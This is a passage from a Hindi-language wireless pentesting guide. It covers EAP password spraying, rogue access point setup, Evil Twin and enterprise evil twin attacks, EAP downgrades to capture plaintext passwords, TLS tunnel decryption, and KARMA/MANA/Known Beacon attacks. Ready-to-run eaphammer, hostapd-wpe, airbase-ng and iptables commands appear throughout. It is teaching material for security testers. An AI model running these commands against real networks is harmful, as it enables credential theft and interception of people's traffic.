चाहे कोई भी प्रोटोकॉल चुना जाए, PEAP/TTLS सर्वर TLS टनल स्थापित होने के बाद उपयोगकर्ता की वास्तविक पहचान के बारे में जानकारी प्राप्त करता है। वास्तविक पहचान को user@realm या केवल user के रूप में दर्शाया जा सकता है। यदि PEAP/TTLS सर्वर उपयोगकर्ता को प्रमाणीकरण करने के लिए भी जिम्मेदार है, तो अब यह उपयोगकर्ता की पहचान रखता है और TLS टनल द्वारा सुरक्षित प्रमाणीकरण विधि के साथ आगे बढ़ता है। वैकल्पिक रूप से, PEAP/TTLS सर्वर उपयोगकर्ता के होम RADIUS सर्वर को एक नया RADIUS अनुरोध अग्रेषित कर सकता है। यह नया RADIUS अनुरोध PEAP या TTLS प्रोटोकॉल परत को छोड़ देता है। जहां सुरक्षित प्रमाणीकरण विधि EAP है, वहां आंतरिक EAP संदेशों को बिना EAP-PEAP या EAP-TTLS आवरण के होम RADIUS सर्वर को भेजा जाता है। आउटगोइंग RADIUS संदेश की User-Name विशेषता उपयोगकर्ता की वास्तविक पहचान को शामिल करती है, जो आने वाले RADIUS अनुरोध से अनाम User-Name को प्रतिस्थापित करती है। जब सुरक्षित प्रमाणीकरण विधि PAP या CHAP (जो केवल TTLS द्वारा समर्थित है) होती है, तो आउटगोइंग RADIUS संदेश में TLS पेलोड से निकाली गई User-Name और अन्य प्रमाणीकरण विशेषताओं को अनाम User-Name और आने वाले RADIUS अनुरोध में पाए गए TTLS EAP-Message विशेषताओं को प्रतिस्थापित किया जाता है।

अधिक जानकारी के लिए देखें https://www.interlinknetworks.com/app_notes/eap-peap.htm

EAP-Bruteforce (password spray)

यदि क्लाइंट से username और password का उपयोग करने की अपेक्षा की जाती है (ध्यान दें कि इस मामले में EAP-TLS मान्य नहीं होगा), तो आप usernames (अगले भाग को देखें) और passwords की एक सूची प्राप्त करने का प्रयास कर सकते हैं और bruteforce का उपयोग करके एक्सेस करने का प्रयास कर सकते हैं air-hammer.

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

आप इस हमले को eaphammer का उपयोग करके भी कर सकते हैं:

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Client attacks Theory

Network Selection and Roaming

• 802.11 प्रोटोकॉल यह परिभाषित करता है कि एक स्टेशन एक विस्तारित सेवा सेट (ESS) में कैसे शामिल होता है, लेकिन यह ESS या इसके भीतर एक एक्सेस पॉइंट (AP) का चयन करने के लिए मानदंड निर्दिष्ट नहीं करता है।

• स्टेशन एक ही ESSID साझा करने वाले APs के बीच घूम सकते हैं, एक भवन या क्षेत्र में कनेक्टिविटी बनाए रखते हुए।

• प्रोटोकॉल ESS के लिए स्टेशन प्रमाणीकरण की आवश्यकता करता है लेकिन स्टेशन के लिए AP प्रमाणीकरण अनिवार्य नहीं करता है।

Preferred Network Lists (PNLs)

• स्टेशन अपने पसंदीदा नेटवर्क सूची (PNL) में हर वायरलेस नेटवर्क के ESSID को संग्रहीत करते हैं, जिसमें नेटवर्क-विशिष्ट कॉन्फ़िगरेशन विवरण भी होते हैं।

• PNL का उपयोग ज्ञात नेटवर्क से स्वचालित रूप से कनेक्ट करने के लिए किया जाता है, जिससे उपयोगकर्ता के अनुभव में सुधार होता है और कनेक्शन प्रक्रिया को सरल बनाया जाता है।

Passive Scanning

• APs समय-समय पर बीकन फ़्रेम प्रसारित करते हैं, अपनी उपस्थिति और विशेषताओं की घोषणा करते हैं, जिसमें AP का ESSID शामिल होता है जब तक कि प्रसारण बंद न किया गया हो।

• पैसिव स्कैनिंग के दौरान, स्टेशन बीकन फ़्रेम सुनते हैं। यदि किसी बीकन का ESSID स्टेशन के PNL में एक प्रविष्टि से मेल खाता है, तो स्टेशन स्वचालित रूप से उस AP से कनेक्ट हो सकता है।

• एक डिवाइस के PNL का ज्ञान संभावित शोषण की अनुमति देता है, एक ज्ञात नेटवर्क के ESSID की नकल करके, डिवाइस को एक धोखाधड़ी AP से कनेक्ट करने के लिए धोखा देना।

Active Probing

• सक्रिय प्रोबिंग में स्टेशन पास के APs और उनकी विशेषताओं का पता लगाने के लिए प्रोब अनुरोध भेजते हैं।

• निर्देशित प्रोब अनुरोध एक विशिष्ट ESSID को लक्षित करते हैं, यह पता लगाने में मदद करते हैं कि क्या कोई विशेष नेटवर्क रेंज में है, भले ही यह एक छिपा हुआ नेटवर्क हो।

• प्रसारण प्रोब अनुरोध में एक शून्य SSID फ़ील्ड होती है और इन्हें सभी नजदीकी APs को भेजा जाता है, जिससे स्टेशन बिना अपने PNL सामग्री का खुलासा किए किसी भी पसंदीदा नेटवर्क की जांच कर सकता है।

Simple AP with redirection to Internet

जटिल हमलों को करने के तरीके को समझाने से पहले यह समझाया जाएगा कैसे केवल एक AP बनाएं और इसके ट्रैफ़िक को इंटरनेट से जुड़े इंटरफेस पर रीडायरेक्ट करें।

ifconfig -a का उपयोग करके जांचें कि AP बनाने के लिए wlan इंटरफेस और इंटरनेट से जुड़े इंटरफेस मौजूद हैं।

DHCP & DNS

apt-get install dnsmasq #Manages DHCP and DNS

/etc/dnsmasq.conf फ़ाइल बनाएँ:

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

फिर IP और routes सेट करें:

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

और फिर शुरू करें dnsmasq:

dnsmasq -C dnsmasq.conf -d

hostapd

apt-get install hostapd

hostapd.conf फ़ाइल बनाएँ:

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

निराशाजनक प्रक्रियाएँ बंद करें, मॉनिटर मोड सेट करें, और hostapd शुरू करें:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

फॉरवर्डिंग और रीडायरेक्शन

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Evil Twin

एक ईविल ट्विन हमला वाईफाई क्लाइंट्स द्वारा नेटवर्कों को पहचानने के तरीके का लाभ उठाता है, जो मुख्य रूप से नेटवर्क नाम (ESSID) पर निर्भर करता है बिना बेस स्टेशन (एक्सेस पॉइंट) को क्लाइंट के लिए खुद को प्रमाणित करने की आवश्यकता के। मुख्य बिंदु शामिल हैं:

• भेदभाव में कठिनाई: उपकरणों के लिए वैध और धोखाधड़ी एक्सेस पॉइंट्स के बीच अंतर करना मुश्किल होता है जब वे समान ESSID और एन्क्रिप्शन प्रकार साझा करते हैं। वास्तविक दुनिया के नेटवर्क अक्सर कवरेज को निर्बाध रूप से बढ़ाने के लिए समान ESSID के साथ कई एक्सेस पॉइंट्स का उपयोग करते हैं।

• क्लाइंट रोमिंग और कनेक्शन हेरफेर: 802.11 प्रोटोकॉल उपकरणों को एक ही ESS के भीतर एक्सेस पॉइंट्स के बीच घूमने की अनुमति देता है। हमलावर इस बात का लाभ उठा सकते हैं कि वे एक उपकरण को उसके वर्तमान बेस स्टेशन से डिस्कनेक्ट करने और एक धोखाधड़ी वाले से कनेक्ट करने के लिए लुभा सकते हैं। यह एक मजबूत सिग्नल प्रदान करके या वैध एक्सेस पॉइंट के साथ कनेक्शन को बाधित करके जैसे कि डिअथेंटिकेशन पैकेट्स या जैमिंग के माध्यम से किया जा सकता है।

• कार्यन्वयन में चुनौतियाँ: कई, अच्छी तरह से रखे गए एक्सेस पॉइंट्स वाले वातावरण में ईविल ट्विन हमले को सफलतापूर्वक कार्यान्वित करना चुनौतीपूर्ण हो सकता है। एकल वैध एक्सेस पॉइंट को डिअथेंटिकेट करने से अक्सर उपकरण को एक अन्य वैध एक्सेस पॉइंट से कनेक्ट करने का परिणाम होता है जब तक कि हमलावर सभी निकटवर्ती एक्सेस पॉइंट्स को डिअथेंटिकेट नहीं कर सकता या धोखाधड़ी वाले एक्सेस पॉइंट को रणनीतिक रूप से नहीं रख सकता।

आप एक बहुत बुनियादी ओपन ईविल ट्विन (इंटरनेट पर ट्रैफ़िक रूट करने की क्षमताओं के बिना) बना सकते हैं:

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

आप eaphammer का उपयोग करके एक Evil Twin भी बना सकते हैं (ध्यान दें कि eaphammer के साथ evil twins बनाने के लिए इंटरफेस monitor मोड में नहीं होना चाहिए):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Or using Airgeddon: Options: 5,6,7,8,9 (inside Evil Twin attack menu).

कृपया ध्यान दें कि डिफ़ॉल्ट रूप से यदि PNL में एक ESSID WPA सुरक्षित के रूप में सहेजा गया है, तो डिवाइस स्वचालित रूप से एक ओपन ईविल ट्विन से कनेक्ट नहीं होगा। आप असली AP पर DoS करने की कोशिश कर सकते हैं और आशा कर सकते हैं कि उपयोगकर्ता मैन्युअल रूप से आपके ओपन ईविल ट्विन से कनेक्ट होगा, या आप असली AP पर DoS कर सकते हैं और हैंडशेक कैप्चर करने के लिए WPA ईविल ट्विन का उपयोग कर सकते हैं (इस विधि का उपयोग करते समय आप पीएसके नहीं जानते हैं, इसलिए आप पीड़ित को अपने साथ कनेक्ट नहीं करवा सकते, लेकिन आप हैंडशेक कैप्चर कर सकते हैं और इसे क्रैक करने की कोशिश कर सकते हैं)।

कुछ OS और AV उपयोगकर्ता को चेतावनी देंगे कि ओपन नेटवर्क से कनेक्ट करना खतरनाक है...

WPA/WPA2 Evil Twin

आप WPA/2 का उपयोग करके एक Evil Twin बना सकते हैं और यदि डिवाइस उस SSID से WPA/2 के साथ कनेक्ट करने के लिए कॉन्फ़िगर किए गए हैं, तो वे कनेक्ट करने की कोशिश करेंगे। किसी भी तरह, 4-way-handshake को पूरा करने के लिए आपको जानना होगा कि क्लाइंट कौन सा पासवर्ड उपयोग करने जा रहा है। यदि आप नहीं जानते हैं, तो कनेक्शन पूरा नहीं होगा।

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Enterprise Evil Twin

इस हमले को समझने के लिए मैं पहले संक्षिप्त WPA Enterprise explanation पढ़ने की सिफारिश करूंगा।

Using hostapd-wpe

hostapd-wpe को काम करने के लिए एक configuration फ़ाइल की आवश्यकता होती है। इन कॉन्फ़िगरेशन के निर्माण को automate करने के लिए आप https://github.com/WJDigby/apd_launchpad का उपयोग कर सकते हैं (//etc/hostapd-wpe/ के अंदर python फ़ाइल डाउनलोड करें)

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

कॉन्फ़िगरेशन फ़ाइल में आप कई विभिन्न चीज़ें चुन सकते हैं जैसे ssid, चैनल, उपयोगकर्ता फ़ाइलें, क्रेट/की, dh पैरामीटर, wpa संस्करण और प्रमाणीकरण...

EAP-TLS के साथ hostapd-wpe का उपयोग करके किसी भी प्रमाणपत्र को लॉगिन करने की अनुमति देना।

EAPHammer का उपयोग करना

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

डिफ़ॉल्ट रूप से, EAPHammer इन प्रमाणीकरण विधियों का उद्देश्य रखता है (ध्यान दें कि GTC पहले प्रयास के रूप में स्पष्ट पासवर्ड प्राप्त करने के लिए है और फिर अधिक मजबूत प्रमाणीकरण विधियों का उपयोग किया जाता है):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

यह लंबे कनेक्शन समय से बचने के लिए डिफ़ॉल्ट पद्धति है। हालाँकि, आप सर्वर को प्रमाणीकरण विधियों को सबसे कमजोर से सबसे मजबूत तक निर्दिष्ट करने के लिए भी कह सकते हैं:

--negotiate weakest

Or you could also use:

• --negotiate gtc-downgrade का उपयोग करके अत्यधिक कुशल GTC डाउनग्रेड कार्यान्वयन (plaintext passwords) का उपयोग करें

• --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP का उपयोग करके मैन्युअल रूप से प्रस्तावित विधियों को निर्दिष्ट करें (हमले के लिए संगठन के समान क्रम में वही प्रमाणीकरण विधियाँ प्रदान करने से हमले का पता लगाना बहुत अधिक कठिन हो जाएगा)।

• Find more info in the wiki

Using Airgeddon

Airgeddon पहले से उत्पन्न प्रमाणपत्रों का उपयोग करके WPA/WPA2-Enterprise नेटवर्क के लिए EAP प्रमाणीकरण प्रदान कर सकता है। नकली नेटवर्क कनेक्शन प्रोटोकॉल को EAP-MD5 में डाउनग्रेड करेगा ताकि यह उपयोगकर्ता और पासवर्ड का MD5 कैप्चर कर सके। बाद में, हमलावर पासवर्ड को क्रैक करने की कोशिश कर सकता है। Airgeddon आपको निरंतर Evil Twin हमले (noisy) या केवल तब तक Evil Attack बनाने की संभावना प्रदान करता है जब तक कोई कनेक्ट न हो (smooth)।

Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks

यह विधि PEAP कनेक्शन में परीक्षण की गई थी लेकिन चूंकि मैं एक मनमाने TLS टनल को डिक्रिप्ट कर रहा हूँ, यह EAP-TTLS के साथ भी काम करना चाहिए

hostapd-wpe की configuration के अंदर dh_file वाली पंक्ति को comment करें (from dh_file=/etc/hostapd-wpe/certs/dh to #dh_file=/etc/hostapd-wpe/certs/dh) यह hostapd-wpe को RSA का उपयोग करके कुंजी का आदान-प्रदान करने के लिए मजबूर करेगा, ताकि आप बाद में ट्रैफ़िक को डिक्रिप्ट कर सकें सर्वर की निजी कुंजी को जानते हुए।

अब Evil Twin को hostapd-wpe का उपयोग करके उस संशोधित कॉन्फ़िगरेशन के साथ सामान्य रूप से शुरू करें। इसके अलावा, Evil Twin हमले को करने वाले interface में wireshark शुरू करें।

अब या बाद में (जब आपने पहले से कुछ प्रमाणीकरण इरादे कैप्चर कर लिए हैं) आप wireshark में निजी RSA कुंजी जोड़ सकते हैं: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...

एक नया प्रविष्टि जोड़ें और इस मानों के साथ फॉर्म भरें: IP address = any -- Port = 0 -- Protocol = data -- Key File (अपनी कुंजी फ़ाइल का चयन करें, समस्याओं से बचने के लिए एक कुंजी फ़ाइल बिना पासवर्ड सुरक्षित के चुनें)।

और नए "Decrypted TLS" टैब पर नज़र डालें:

KARMA, MANA, Loud MANA and Known beacons attack

ESSID and MAC black/whitelists

Media Access Control Filter Lists (MFACLs) के विभिन्न प्रकार और उनके संबंधित मोड और एक धोखाधड़ी Access Point (AP) के व्यवहार पर प्रभाव:

1. MAC-आधारित Whitelist:

• धोखाधड़ी AP केवल व्हाइटलिस्ट में निर्दिष्ट उपकरणों से प्रॉब अनुरोधों का उत्तर देगा, अन्य सभी के लिए अदृश्य रहेगा।

2. MAC-आधारित Blacklist:

• धोखाधड़ी AP ब्लैकलिस्ट में उपकरणों से प्रॉब अनुरोधों की अनदेखी करेगा, प्रभावी रूप से धोखाधड़ी AP को उन विशिष्ट उपकरणों के लिए अदृश्य बना देगा।

3. SSID-आधारित Whitelist:

• धोखाधड़ी AP केवल विशिष्ट ESSIDs के लिए प्रॉब अनुरोधों का उत्तर देगा, जिससे यह उन उपकरणों के लिए अदृश्य हो जाएगा जिनकी पसंदीदा नेटवर्क सूचियों (PNLs) में वे ESSIDs शामिल नहीं हैं।

4. SSID-आधारित Blacklist:

• धोखाधड़ी AP ब्लैकलिस्ट में विशिष्ट ESSIDs के लिए प्रॉब अनुरोधों का उत्तर नहीं देगा, जिससे यह उन उपकरणों के लिए अदृश्य हो जाएगा जो उन विशेष नेटवर्क की तलाश कर रहे हैं।

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

यह विधि हमलावर को एक दुर्भावनापूर्ण एक्सेस पॉइंट (AP) बनाने की अनुमति देती है जो नेटवर्क से कनेक्ट करने की कोशिश कर रहे उपकरणों से सभी प्रॉब अनुरोधों का उत्तर देती है। यह तकनीक उपकरणों को हमलावर के AP से कनेक्ट करने के लिए धोखा देती है जो उपकरणों द्वारा खोजे जा रहे नेटवर्क की नकल करती है। एक बार जब एक उपकरण इस धोखेबाज़ AP को कनेक्शन अनुरोध भेजता है, तो यह कनेक्शन पूरा करता है, जिससे उपकरण गलती से हमलावर के नेटवर्क से कनेक्ट हो जाता है।

MANA

फिर, उपकरणों ने अनचाहे नेटवर्क प्रतिक्रियाओं की अनदेखी करना शुरू कर दिया, जिससे मूल कर्मा हमले की प्रभावशीलता कम हो गई। हालाँकि, एक नई विधि, जिसे MANA हमले के रूप में जाना जाता है, को इयान डी विल्लियर्स और डोमिनिक व्हाइट द्वारा पेश किया गया। यह विधि धोखेबाज़ AP उपकरणों से प्रेफर्ड नेटवर्क सूचियों (PNL) को कैप्चर करने के लिए उनके प्रसारण प्रॉब अनुरोधों का उत्तर देने में शामिल है जिसमें उपकरणों द्वारा पहले से अनुरोधित नेटवर्क नाम (SSIDs) होते हैं। यह जटिल हमला मूल कर्मा हमले के खिलाफ सुरक्षा को दरकिनार करता है, उपकरणों द्वारा ज्ञात नेटवर्क को याद रखने और प्राथमिकता देने के तरीके का लाभ उठाकर।

MANA हमला उपकरणों से निर्देशित और प्रसारण प्रॉब अनुरोधों की निगरानी करके काम करता है। निर्देशित अनुरोधों के लिए, यह उपकरण के MAC पते और अनुरोधित नेटवर्क नाम को रिकॉर्ड करता है, इस जानकारी को एक सूची में जोड़ता है। जब एक प्रसारण अनुरोध प्राप्त होता है, तो AP उस जानकारी के साथ उत्तर देता है जो उपकरण की सूची में किसी भी नेटवर्क से मेल खाती है, उपकरण को धोखेबाज़ AP से कनेक्ट करने के लिए लुभाती है।

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

A Loud MANA attack एक उन्नत रणनीति है जब उपकरण निर्देशित प्रॉबिंग का उपयोग नहीं करते हैं या जब उनके प्रेफर्ड नेटवर्क लिस्ट (PNL) हमलावर के लिए अज्ञात होते हैं। यह इस सिद्धांत पर काम करता है कि एक ही क्षेत्र में उपकरणों के PNL में कुछ नेटवर्क नाम साझा करने की संभावना होती है। चयनात्मक रूप से प्रतिक्रिया देने के बजाय, यह हमला सभी अवलोकित उपकरणों के संयुक्त PNL में पाए गए प्रत्येक नेटवर्क नाम (ESSID) के लिए प्रॉब प्रतिक्रियाएँ प्रसारित करता है। यह व्यापक दृष्टिकोण एक उपकरण के लिए एक परिचित नेटवर्क को पहचानने और धोखाधड़ी वाले एक्सेस पॉइंट (AP) से कनेक्ट करने का प्रयास करने की संभावना को बढ़ाता है।

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Known Beacon attack

जब Loud MANA attack पर्याप्त नहीं हो सकता, Known Beacon attack एक और दृष्टिकोण प्रस्तुत करता है। यह विधि किसी भी नेटवर्क नाम का उत्तर देने वाले AP का अनुकरण करके कनेक्शन प्रक्रिया को ब्रूट-फोर्स करती है, संभावित ESSIDs की एक सूची के माध्यम से चक्रित करती है जो एक शब्द सूची से निकाली गई है। यह कई नेटवर्कों की उपस्थिति का अनुकरण करता है, उम्मीद करते हुए कि यह पीड़ित के PNL के भीतर एक ESSID से मेल खाता है, जो निर्मित AP से कनेक्शन प्रयास को प्रेरित करता है। इस हमले को --loud विकल्प के साथ मिलाकर उपकरणों को फंसाने के लिए अधिक आक्रामक प्रयास के लिए बढ़ाया जा सकता है।

Eaphammer ने इस हमले को एक MANA हमले के रूप में लागू किया जहां सूची के भीतर सभी ESSIDs चार्ज किए जाते हैं (आप इसे --loud के साथ मिलाकर Loud MANA + Known beacons attack भी बना सकते हैं):

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Known Beacon Burst attack

Known Beacon Burst attack में एक फ़ाइल में सूचीबद्ध प्रत्येक ESSID के लिए बेकन फ़्रेम का तेज़ी से प्रसारण करना शामिल है। यह नकली नेटवर्क का एक घना वातावरण बनाता है, जिससे उपकरणों के धोखाधड़ी AP से कनेक्ट होने की संभावना बहुत बढ़ जाती है, विशेष रूप से MANA हमले के साथ मिलाकर। यह तकनीक गति और मात्रा का लाभ उठाकर उपकरणों के नेटवर्क चयन तंत्र को अभिभूत करती है।

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct एक प्रोटोकॉल है जो उपकरणों को पारंपरिक वायरलेस एक्सेस पॉइंट की आवश्यकता के बिना सीधे एक-दूसरे से लिंक करने की अनुमति देता है। यह क्षमता विभिन्न इंटरनेट ऑफ थिंग्स (IoT) उपकरणों, जैसे प्रिंटर और टेलीविज़न में एकीकृत है, जो सीधे उपकरण-से-उपकरण संचार को सुविधाजनक बनाती है। Wi-Fi Direct की एक महत्वपूर्ण विशेषता यह है कि एक उपकरण एक एक्सेस पॉइंट की भूमिका निभाता है, जिसे समूह मालिक कहा जाता है, जो कनेक्शन का प्रबंधन करता है।

Wi-Fi Direct कनेक्शनों के लिए सुरक्षा Wi-Fi Protected Setup (WPS) के माध्यम से स्थापित की जाती है, जो सुरक्षित पेयरिंग के लिए कई विधियों का समर्थन करती है, जिसमें शामिल हैं:

• Push-Button Configuration (PBC)

• PIN entry

• Near-Field Communication (NFC)

ये विधियाँ, विशेष रूप से PIN entry, पारंपरिक Wi-Fi नेटवर्क में WPS के समान कमजोरियों के प्रति संवेदनशील हैं, जिससे ये समान हमले के लक्ष्यों बन जाते हैं।

EvilDirect Hijacking

EvilDirect Hijacking एक ऐसा हमला है जो Wi-Fi Direct के लिए विशिष्ट है। यह Evil Twin हमले के सिद्धांत को दर्शाता है लेकिन Wi-Fi Direct कनेक्शनों को लक्षित करता है। इस परिदृश्य में, एक हमलावर एक वैध समूह मालिक का अनुकरण करता है जिसका उद्देश्य उपकरणों को एक दुर्भावनापूर्ण इकाई से कनेक्ट करने के लिए धोखा देना है। इस विधि को airbase-ng जैसे उपकरणों का उपयोग करके निष्पादित किया जा सकता है, जिसमें अनुकरण किए गए उपकरण का चैनल, ESSID और MAC पता निर्दिष्ट किया जाता है:

References

• https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee

• https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9

• https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38

• https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d

• https://github.com/gdssecurity/Whitepapers/blob/master/GDS%20Labs%20-%20Identifying%20Rogue%20Access%20Point%20Attacks%20Using%20Probe%20Response%20Patterns%20and%20Signal%20Strength.pdf

• http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/

• https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/

• https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d

• https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)

• https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/

TODO: Take a look to https://github.com/wifiphisher/wifiphisher (login con facebook e imitacionde WPA en captive portals)

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!